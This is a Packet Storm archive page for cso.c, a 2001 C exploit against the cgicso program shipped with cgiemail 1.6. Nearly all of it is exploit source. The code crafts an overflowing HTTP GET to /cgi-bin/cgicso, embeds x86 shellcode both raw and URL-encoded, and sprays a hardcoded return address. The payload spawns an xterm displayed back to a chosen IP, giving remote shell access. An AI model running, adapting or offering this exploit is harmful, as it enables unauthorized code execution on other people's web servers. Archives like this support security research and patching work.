exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

cso.c

cso.c
Posted Sep 11, 2001
Authored by hhp, Ben Schultz | Site hhp-programming.net

Cso.c is a remote exploit for cgicso included with cgiemail 1.6. Tested on Slackware Linux 7.1 running Apache 1.3.20.

tags | exploit, remote
systems | linux, slackware
SHA-256 | 8d232fa0a2687a8c7dc294c61bb1c84b0a1be65bdeb8565fa7f6f9fa693a87cb

cso.c

Change Mirror Download
/*
* cso.c (06/30/01)
*
* Remote exploit for cgicso included with cgiemail 1.6
* Tested on Slackware Linux 7.1 running Apache 1.3.20
* Spawns an xterm on your display.
*
*
* Note: In order to exploit, cgicso must be compiled with
* CGI_CSO_HARDCODE undefined, otherwise it will bypass
* the exploitable portion of code.
*
*
* Exploit By: isox of hhp. (isox@chainsawbeer.com)
* Site: www.hhp-programming.net && 0xc0ffee.com
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define RET 0xbfffe208 // Slackware 7.1.0
#define LEN 2038
#define PORT 80

char noncode[] =
"\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b"
"\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88"
"\x34\x32\x31\xd2\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d"
"\x7e\x19\x89\x7e\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e"
"\x36\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xac\xff\xff\xff"
"/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K";

char code[] =
"%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c"
"%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15"
"%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d"
"%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75"
"%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74"
"%38%2d%64%69%73%70%6c%61%79%38"
"%31%32%37%2e%30%2e%30%2e%31" // unicoded IP address
"%3a%30%4b";



int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address=RET;
int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0;
struct hostent *t;
struct sockaddr_in s;


if(argc < 2) {
fprintf(stderr, "usage: %s <host> [offset [--debug]]\n", argv[0]);
exit(-1);
}

if(argc > 2)
address -= atoi(argv[2]);

if(argc > 3) {
if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d")))
debug = 1;
}


fprintf(stderr, "Using Address: 0x%lx\n", address);

buf = (char *)malloc(44 + LEN + diff + 1);
p = buf;


(*p++) = 'G';
(*p++) = 'E';
(*p++) = 'T';
(*p++) = ' ';
(*p++) = '/';
(*p++) = 'c';
(*p++) = 'g';
(*p++) = 'i';
(*p++) = '-';
(*p++) = 'b';
(*p++) = 'i';
(*p++) = 'n';
(*p++) = '/';
(*p++) = 'c';
(*p++) = 'g';
(*p++) = 'i';
(*p++) = 'c';
(*p++) = 's';
(*p++) = 'o';
(*p++) = '?';
(*p++) = 'f';
(*p++) = 'i';
(*p++) = 'n';
(*p++) = 'g';
(*p++) = 'e';
(*p++) = 'r';
(*p++) = 'h';
(*p++) = 'o';
(*p++) = 's';
(*p++) = 't';
(*p++) = '=';
(*p++) = 'A'; // Yes this should be an A
(*p++) = '&';
(*p++) = 'q';
(*p++) = 'u';
(*p++) = 'e';
(*p++) = 'r';
(*p++) = 'y';
(*p++) = '=';
(*p++) = 'A'; // Yes this should be an A
(*p++) = 'A'; // Yes this should be an A
(*p++) = 'A'; // Yes this should be an A

for(i=0; i<strlen(code); i++)
(*p++) = code[i];

addressp = (long *)p;

for(i=0; i<(LEN - strlen(code)) + diff; i+=4)
(*addressp++) = address;


strcat(buf, "\n\n");
fprintf(stderr, "Using length: %d\n", strlen(buf));




/*
* Connect
*/

if(s.sin_addr.s_addr=inet_addr(argv[1])) {
if(!(t=gethostbyname(argv[1]))) {
printf("Connection Failed.\n");
exit(-1);
}

memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
}

s.sin_family=AF_INET;
s.sin_port=htons(PORT);

sock=socket(AF_INET,SOCK_STREAM,0);


if(connect(sock,(struct sockaddr*)&s,sizeof(s))) {
fprintf(stderr, "Connection failed.\n");
exit(-1);
}

fprintf(stderr, "done.\n");
fprintf(stderr, "Sending buffer... ");
send(sock, buf, strlen(buf), 0);
fprintf(stderr, "done.\n");

sleep(2);

if(debug == 1) {
fprintf(stderr, "Entering Debug Mode... \n");
initstream(sock);
}

close(sock);
free(buf);
exit(0);
}



int initstream(int sock) {
int n;
char recvbuf[1024];
fd_set rset;

while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock+1,&rset,NULL,NULL,NULL);

if (FD_ISSET(sock,&rset)) {
if((n=read(sock,recvbuf,1024)) <= 0) {
printf("Connection closed by foreign host.\n");
exit(0);
}

recvbuf[n]=0;
printf("%s",recvbuf);
}

if (FD_ISSET(STDIN_FILENO,&rset)) {
if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) {
recvbuf[n]=0;
write(sock,recvbuf,n);
}
}
}

return;
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close